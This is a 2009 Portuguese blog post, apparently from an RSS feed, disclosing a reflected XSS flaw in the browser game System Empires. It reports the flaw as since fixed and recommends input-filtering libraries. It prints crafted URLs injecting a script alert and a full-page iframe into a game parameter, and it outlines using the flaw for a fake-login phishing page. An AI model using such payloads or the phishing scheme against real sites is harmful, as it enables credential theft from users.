<p>Hoje venho mostrar-vos como é fácil encontrar vulnerabilidades em páginas web, para inaugurar esta nova &#8220;categoria&#8221; do blog o website escolhido foi o jogo web-based <a title="System Empires" href="http://civ.sysemp.com?470" target="_blank" class="broken_link">System Empires</a> jogo este que tenho vindo a jogar e a falha nele explorada será o tipo de falha Cross-site scripting (XSS) esta falha, para os que não sabem, permite fazer injecção de código numa página, esta é uma vulnerabilidade client-side pois só se dá no browser da vítima e não afecta, directamente, o servidor.</p>
<p><span style="text-decoration: underline;">Nota:</span> <span style="text-decoration: line-through;">esta falha é apenas vísivel a membros registados no jogo</span>. Vulnerabilidade corrigida (<a title="Detalhes da correcção da vulnerabilidade" href="http://joaopedropereira.com/blog/2009/05/01/vulnerabilidade-xss-system-empires/#comments" target="_blank">mais informações</a>)</p>
<p><span id="more-306"></span></p>
<p>Uma funcionalidade que o jogo tem é de verificar nas regiões visiveis ao nosso observatório se ele está online para poder executar o ataque com mais segurança.</p>
<p><a href="http://joaopedropereira.com/blog/wp-content/uploads/2009/05/se-civ_1241197364663.png"><img class="aligncenter size-medium wp-image-307" title="SystemEmpires_Online" src="http://joaopedropereira.com/blog/wp-content/uploads/2009/05/se-civ_1241197364663-262x300.png" alt="SystemEmpires_Online" width="262" height="300" /></a></p>
<p>E como é o URL desta funcionalidade formado?</p>
<p style="text-align: center;">http://civ.sysemp.com/players.php?<strong>u</strong>=470&amp;<strong>n</strong>=skin&amp;pop</p>
<p style="text-align: left;"><strong>u</strong> &#8211; Unique_ID do membro</p>
<p><strong>n</strong> &#8211; texto a mostrar na janela
</p>
<p style="text-align: left;">Onde reside a falha neste URL?</p>
<p style="text-align: left;">No parâmetro n. Para não fazer mais uma query à base de dados os programadores optaram por passar o parâmetro anteriormente e esqueceram-se de fazer filtragem dos dados. Assim sem qualquer filtragem é possível passar qualquer tipo de dados incluindo elementos HTML.</p>
<p style="text-align: left;">Introduzindo então informações no lugar de skin, por exemplo:</p>
<p style="text-align: left;">http://civ.sysemp.com/players.php?u=470&amp;n=&lt;script&gt;alert(&#8220;XSS?&#8221;);&lt;/script&gt;&amp;pop</p>
<p style="text-align: left;">Vamos obter o seguinte resultado:</p>
<p style="text-align: left;"><a href="http://joaopedropereira.com/blog/wp-content/uploads/2009/05/capturaecra1.png"><img class="aligncenter size-medium wp-image-309" title="SystemEmpires_Script_Alert" src="http://joaopedropereira.com/blog/wp-content/uploads/2009/05/capturaecra1-300x136.png" alt="SystemEmpires_Script_Alert" width="300" height="136" /></a></p>
<p style="text-align: left;">Agora se tentarmos colocar uma página para tentar enganar alguém que aceda através deste URL podemos utilizar iframes por exemplo:</p>
<p style="text-align: left;">http://civ.sysemp.com/players.php?u=470&amp;n=&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;iframe src =&#8221;http://joaopedropereira.com/&#8221; width=&#8221;110%&#8221; height=&#8221;3000px&#8221; scrolling=&#8221;no&#8221; frameborder=&#8221;0&#8243;&gt;&lt;/iframe&gt;&lt;/table&gt;&amp;pop</p>
<p style="text-align: left;"><a href="http://joaopedropereira.com/blog/wp-content/uploads/2009/05/se-civ_1241199328082.png"><img class="aligncenter size-medium wp-image-310" title="SystemEmpires_iframe" src="http://joaopedropereira.com/blog/wp-content/uploads/2009/05/se-civ_1241199328082-123x300.png" alt="SystemEmpires_iframe" width="123" height="300" /></a></p>
<p style="text-align: left;">Neste caso a única coisa que acontece é a página do jogo ficar com a minha página pessoal a ocupar tudo, mas imaginemos que alguém queria fazer algo de mal, podia gerar uma página de login igual à do jogo e colocar num host privado guardando todas as passwords que os utilizadores introduzissem sem saberem que estavam fora do jogo&#8230; Claro que para isso era necessário alguma engenharia social e técnicas de phishing mas com isto era muitissimo fácil de realizar e era possível de realizar com poucos conhecimentos a esse nível.</p>
<p style="text-align: left;">A falha já foi reportada à administração, esperemos brevidade na resolução do problema.</p>
<p style="text-align: left;">Quem se quiser proteger contra este tipo de vulnerabilidades pode utilizar vários programas como o <a title="HTML Purifier WebSite" href="http://htmlpurifier.org/" target="_blank">HTML Purifier</a> (permite algumas tags HTML), ou então aconselho vivamente a utilização da <a title="Code Igniter: Input &amp; Security Class" href="http://codeigniter.com/user_guide/libraries/input.html" target="_blank">Input Class</a> da framework Code Igniter (quem não quiser utilizar a framework completa pode alterar o ficheiro e utilizar apenas o que lhe convém e até fazer modificações).</p>
<p style="text-align: left;">E vocês o que acham deste tipo de vulnerabilidades? E como as aproveitariam?</p>
<div class="shr-publisher-306"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F05%2F01%2Fvulnerabilidade-xss-system-empires%2F' data-shr_title='Vulnerabilidade+XSS+no+jogo+System+Empires'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F05%2F01%2Fvulnerabilidade-xss-system-empires%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F05%2F01%2Fvulnerabilidade-xss-system-empires%2F' data-shr_title='Vulnerabilidade+XSS+no+jogo+System+Empires'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2009/05/01/vulnerabilidade-xss-system-empires/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>

